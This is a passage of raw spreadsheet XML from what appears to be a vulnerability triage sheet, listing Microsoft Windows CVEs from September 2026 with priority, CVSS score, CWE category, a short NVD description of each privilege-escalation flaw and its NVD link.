s="5" t="inlineStr" /><c r="H1428" s="5" t="n"><v>0.003</v></c><c r="I1428" s="5" t="inlineStr" /><c r="J1428" s="5" t="inlineStr" /><c r="K1428" s="5" t="inlineStr" /><c r="L1428" s="5" t="inlineStr" /><c r="M1428" s="5" t="inlineStr" /><c r="N1428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1428" s="5" t="inlineStr" /><c r="Q1428" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1428" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1428" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t></is></c></row><row r="1429"><c r="A1429" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1429" s="5" t="inlineStr"><is><t>CVE-2026-69735</t></is></c><c r="D1429" s="5" t="n"><v>7</v></c><c r="E1429" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1429" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1429" s="5" t="inlineStr" /><c r="H1429" s="5" t="n"><v>0.003</v></c><c r="I1429" s="5" t="inlineStr" /><c r="J1429" s="5" t="inlineStr" /><c r="K1429" s="5" t="inlineStr" /><c r="L1429" s="5" t="inlineStr" /><c r="M1429" s="5" t="inlineStr" /><c r="N1429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1429" s="5" t="inlineStr" /><c r="Q1429" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1429" s="5" t="inlineStr"><is><t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1429" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t></is></c></row><row r="1430"><c r="A1430" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1430" s="5" t="inlineStr"><is><t>CVE-2026-69779</t></is></c><c r="D1430" s="5" t="n"><v>7</v></c><c r="E1430" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1430" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1430" s="5" t="inlineStr" /><c r="H1430" s="5" t="n"><v>0.002</v></c><c r="I1430" s="5" t="inlineStr" /><c r="J1430" s="5" t="inlineStr" /><c r="K1430" s="5" t="inlineStr" /><c r="L1430" s="5" t="inlineStr" /><c r="M1430" s="5" t="inlineStr" /><c r="N1430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1430" s="5" t="inlineStr" /><c r="Q1430" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R1430" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="S1430" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t></is></c></row><row r="1431"><c r="A1431" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1431" s="5" t="inlineStr"><is><t>CVE-2026-69791</t></is></c><c r="D1431" s="5" t="n"><v>7</v></c><c r="E1431" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1431" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1431" s="5" t="inlineStr" /><c r="H1431" s="5" t="n"><v>0.003</v></c><c r="I1431" s="5" t="inlineStr" /><c r="J1431" s="5" t="inlineStr" /><c r="K1431" s="5" t="inlineStr" /><c r="L1431" s="5" t="inlineStr" /><c r="M1431" s="5" t="inlineStr" /><c r="N1431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1431" s="5" t="inlineStr" /><c r="Q1431" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1431" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1431" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t></is></c></row><row r="1432"><c r="A1432" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1432" s="5" t="inlineStr"><is><t>CVE-2026-69806</t></is></c><c r="D1432" s="5" t="n"><v>7</v></c><c r="E1432" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1432" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1432" s="5" t="inlineStr" /><c r="H1432" s="5" t="n"><v>0.018</v></c><c r="I1432" s="5" t="inlineStr" /><c r="J1432" s="5" t="inlineStr" /><c r="K1432" s="5" t="inlineStr" /><c r="L1432" s="5" t="inlineStr" /><c r="M1432" s="5" t="inlineStr" /><c r="N1432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1432" s="5" t="inlineStr" /><c r="Q1432" s="5" t="inlineStr"><is><t>CWE-200, CWE-94</t></is></c><c r="R1432" s="5" t="inlineStr"><is><t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1432" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t></is></c></row><row r="1433"><c r="A1433" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1433" s="5" t="inlineStr"><is><t>CVE-2026-69814</t></is></c><c r="D1433" s="5" t="n"><v>7</v></c><c r="E1433" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1433" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1433" s="5" t="inlineStr" /><c r="H1433" s="5" t="n"><v>0.003</v></c><c r="I1433" s="5" t="inlineStr" /><c r="J1433" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1433" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1433" s="5" t="inlineStr" /><c r="M1433" s="5" t="inlineStr" /><c r="N1433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1433" s="5" t="inlineStr" /><c r="Q1433" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1433" s="5" t="inlineStr"><is><t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1433" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t></is></c></row><row r="1434"><c r="A1434" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1434" s="5" t="inlineStr"><is><t>CVE-2026-69816</t></is></c><c r="D1434" s="5" t="n"><v>7</v></c><c r="E1434" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1434" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1434" s="5" t="inlineStr" /><c r="H1434" s="5" t="n"><v>0.003</v></c><c r="I1434" s="5" t="inlineStr" /><c r="J1434" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K143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34" s="5" t="inlineStr" /><c r="M1434" s="5" t="inlineStr" /><c r="N1434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1434" s="5" t="inlineStr" /><c r="Q1434" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1434" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1434" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t></is></c></row><row r="1435"><c r="A1435" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1435" s="5" t="inlineStr"><is><t>CVE-2026-69817</t></is></c><c r="D1435" s="5" t="n"><v>7</v></c><c r="E1435" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1435" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1435" s="5" t="inlineStr" /><c r="H1435" s="5" t="n"><v>0.003</v></c><c r="I1435" s="5" t="inlineStr" /><c r="J1435" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K143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35" s="5" t="inlineStr" /><c r="M1435" s="5" t="inlineStr" /><c r="N1435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1435" s="5" t="inlineStr" /><c r="Q1435" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1435" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1435" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t></is></c></row><row r="1436"><c r="A1436" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1436" s="5" t="inlineStr"><is><t>CVE-2026-69818</t></is></c><c r="D1436" s="5" t="n"><v>7</v></c><c r="E1436" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1436" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1436" s="5" t="inlineStr" /><c r="H1436" s="5" t="n"><v>0.003</v></c><c r="I1436" s="5" t="inlineStr" /><c r="J1436" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1436" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1436" s="5" t="inlineStr" /><c r="M1436" s="5" t="inlineStr" /><c r="N1436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1436" s="5" t="inlineStr" /><c r="Q1436" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1436" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1436" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t></is></c></row><row r="1437"><c r="A1437" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1437" s="5" t="inlineStr"><is><t>CVE-2026-69834</t></is></c><c r="D1437" s="5" t="n"><v>7</v></c><c r="E1437" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1437" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1437" s="5" t="inlineStr" /><c r="H1437" s="5" t="n"><v>0.003</v></c><c r="I1437" s="5" t="inlineStr" /><c r="J1437" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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37" s="5" t="inlineStr" /><c r="M1437" s="5" t="inlineStr" /><c r="N1437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1437" s="5" t="inlineStr" /><c r="Q1437" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1437" s="5" t="inlineStr"><is><t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1437" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t></is></c></row><row r="1438"><c r="A1438" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1438" s="5" t="inlineStr"><is><t>CVE-2026-69838</t></is></c><c r="D1438" s="5" t="n"><v>7</v></c><c r="E1438" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1438" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1438" s="5" t="inlineStr" /><c r="H1438" s="5" t="n"><v>0.003</v></c><c r="I1438" s="5" t="inlineStr" /><c r="J1438" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K143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38" s="5" t="inlineStr" /><c r="M1438" s="5" t="inlineStr" /><c r="N1438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1438" s="5" t="inlineStr" /><c r="Q1438" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1438" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1438" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t></is></c></row><row r="1439"><c r="A1439" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1439" s="5" t="inlineStr"><is><t>CVE-2026-69859</t></is></c><c r="D1439" s="5" t="n"><v>7</v></c><c r="E1439" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1439" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1439" s="5" t="inlineStr" /><c r="H1439" s="5" t="n"><v>0.002</v></c><c r="I1439" s="5" t="inlineStr" /><c r="J1439" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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39" s="5" t="inlineStr" /><c r="M1439" s="5" t="inlineStr" /><c r="N1439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1439" s="5" t="inlineStr" /><c r="Q1439" s="5" t="inlineStr"><is><t>CWE-191, CWE-367</t></is></c><c r="R1439" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="S1439" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t></is></c></row><row r="1440"><c r="A1440" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1440" s="5" t="inlineStr"><is><t>CVE-2026-69866</t></is></c><c r="D1440" s="5" t="n"><v>7</v></c><c r="E1440" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1440" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1440" s="5" t="inlineStr" /><c r="H1440" s="5" t="n"><v>0.003</v></c><c r="I1440" s="5" t="inlineStr" /><c r="J1440" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K144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440" s="5" t="inlineStr" /><c r="M1440" s="5" t="inlineStr" /><c r="N1440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1440" s="5" t="inlineStr" /><c r="Q1440" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1440" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1440" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t></is></c></row><row r="1441"><c r="A1441" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1441" s="5" t="inlineStr"><is><t>CVE-2026-69889</t></is></c><c r="D1441" s="5" t="n"><v>7</v></c><c r="E1441" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1441" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1441" s="5" t="inlineStr" /><c r="H1441" s="5" t="n"><v>0.003</v></c><c r="I1441" s="5" t="inlineStr" /><c r="J1441" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1441"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441" s="5" t="inlineStr" /><c r="M1441" s="5" t="inlineStr" /><c r="N1441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1441" s="5" t="inlineStr" /><c r="Q1441" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1441" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1441" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t></is></c></row><row r="1442"><c r="A1442" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1442" s="5" t="inlineStr"><is><t>CVE-2026-69891</t></is></c><c r="D1442" s="5" t="n"><v>7</v></c><c r="E1442" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1442" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1442" s="5" t="inlineStr" /><c r="H1442" s="5" t="n"><v>0.003</v></c><c r="I1442" s="5" t="inlineStr" /><c r="J1442" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1442"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42" s="5" t="inlineStr" /><c r="M1442" s="5" t="inlineStr" /><c r="N1442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1442" s="5" t="inlineStr" /><c r="Q1442" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1442" s="5" t="inlineStr"><is><t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1442" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t></is></c></row><row r="1443"><c r="A1443" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1443" s="5" t="inlineStr"><is><t>CVE-2026-69896</t></is></c><c r="D1443" s="5" t="n"><v>7</v></c><c r="E1443" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1443" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1443" s="5" t="inlineStr" /><c r="H1443" s="5" t="n"><v>0.003</v></c><c r="I1443" s="5" t="inlineStr" /><c r="J1443" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1443" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1443" s="5" t="inlineStr" /><c r="M1443" s="5" t="inlineStr" /><c r="N1443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1443" s="5" t="inlineStr" /><c r="Q1443" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1443" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1443" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t></is></c></row><row r="1444"><c r="A1444" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1444" s="5" t="inlineStr"><is><t>CVE-2026-69911</t></is></c><c r="D1444" s="5" t="n"><v>7</v></c><c r="E1444" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1444" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1444" s="5" t="inlineStr" /><c r="H1444" s="5" t="n"><v>0.003</v></c><c r="I1444" s="5" t="inlineStr" /><c r="J1444" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K144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4" s="5" t="inlineStr" /><c r="M1444" s="5" t="inlineStr" /><c r="N1444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1444" s="5" t="inlineStr" /><c r="Q1444" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1444" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1444" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t></is></c></row><row r="1445"><c r="A1445" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1445" s="5" t="inlineStr"><is><t>CVE-2026-70283</t></is></c><c r="D1445" s="5" t="n"><v>7</v></c><c r="E1445" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1445" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1445" s="5" t="inlineStr" /><c r="H1445" s="5" t="n"><v>0.002</v></c><c r="I1445" s="5" t="inlineStr" /><c r="J1445" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K144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5" s="5" t="inlineStr" /><c r="M1445" s="5" t="inlineStr" /><c r="N1445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1445" s="5" t="inlineStr" /><c r="Q1445" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1445" s="5" t="inlineStr"><is><t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1445" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t></is></c></row><row r="1446"><c r="A1446" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1446" s="5" t="inlineStr"><is><t>CVE-2026-70562</t></is></c><c r="D1446" s="5" t="n"><v>7</v></c><c r="E1446" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1446" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1446" s="5" t="inlineStr" /><c r="H1446" s="5" t="n"><v>0.003</v></c><c r="I1446" s="5" t="inlineStr" /><c r="J1446" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K144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6" s="5" t="inlineStr" /><c r="M1446" s="5" t="inlineStr" /><c r="N1446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1446" s="5" t="inlineStr" /><c r="Q1446" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R1446" s="5" t="inlineStr"><is><t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1446" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t></is></c></row><row r="1447"><c r="A1447" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1447" s="5" t="inlineStr"><is><t>CVE-2026-70565</t></is></c><c r="D1447" s="5" t="n"><v>7</v></c><c r="E1447" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1447" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1447" s="5" t="inlineStr" /><c r="H1447" s="5" t="n"><v>0.003</v></c><c r="I1447" s="5" t="inlineStr" /><c r="J1447" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K144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7" s="5" t="inlineStr" /><c r="M1447" s="5" t="inlineStr" /><c r="N1447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1447" s="5" t="inlineStr" /><c r="Q1447" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1447" s="5" t="inlineStr"><is><t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1447" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t></is></c></row><row r="1448"><c r="A1448" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1448" s="5" t="inlineStr"><is><t>CVE-2026-70567</t></is></c><c r="D1448" s="5" t="n"><v>7</v></c><c r="E1448" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1448" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1448" s="5" t="inlineStr" /><c r="H1448" s="5" t="n"><v>0.003</v></c><c r="I1448" s="5" t="inlineStr" /><c r="J1448" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1448" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1448" s="5" t="inlineStr" /><c r="M1448" s="5" t="inlineStr" /><c r="N1448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1448" s="5" t="inlineStr" /><c r="Q1448" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R1448" s="5" t="inlineStr"><is><t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t></is></c></row><row r="1449"><c r="A1449" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1449" s="5" t="inlineStr"><is><t>CVE-2026-70568</t></is></c><c r="D1449" s="5" t="n"><v>7</v></c><c r="E1449" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1449" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1449" s="5" t="inlineStr" /><c r="H1449" s="5" t="n"><v>0.003</v></c><c r="I1449" s="5" t="inlineStr" /><c r="J1449" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K144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49" s="5" t="inlineStr" /><c r="M1449" s="5" t="inlineStr" /><c r="N1449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1449" s="5" t="inlineStr" /><c r="Q1449" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1449" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t></is></c></row><row r="1450"><c r="A1450" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1450" s="5" t="inlineStr"><is><t>CVE-2026-70573</t></is></c><c r="D1450" s="5" t="n"><v>7</v></c><c r="E1450" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1450" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1450" s="5" t="inlineStr" /><c r="H1450" s="5" t="n"><v>0.003</v></c><c r="I1450" s="5" t="inlineStr" /><c r="J1450" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1450"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50" s="5" t="inlineStr" /><c r="M1450" s="5" t="inlineStr" /><c r="N1450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1450" s="5" t="inlineStr" /><c r="Q1450" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R1450" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t></is></c></row><row r="1451"><c r="A1451" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1451" s="5" t="inlineStr"><is><t>CVE-2026-70577</t></is></c><c r="D1451" s="5" t="n"><v>7</v></c><c r="E1451" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1451" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1451" s="5" t="inlineStr" /><c r="H1451" s="5" t="n"><v>0.003</v></c><c r="I1451" s="5" t="inlineStr" /><c r="J1451" s="5" t="inlineStr" /><c r="K1451" s="5" t="inlineStr" /><c r="L1451" s="5" t="inlineStr" /><c r="M1451" s="5" t="inlineStr" /><c r="N1451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1451" s="5" t="inlineStr" /><c r="Q1451" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1451" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c 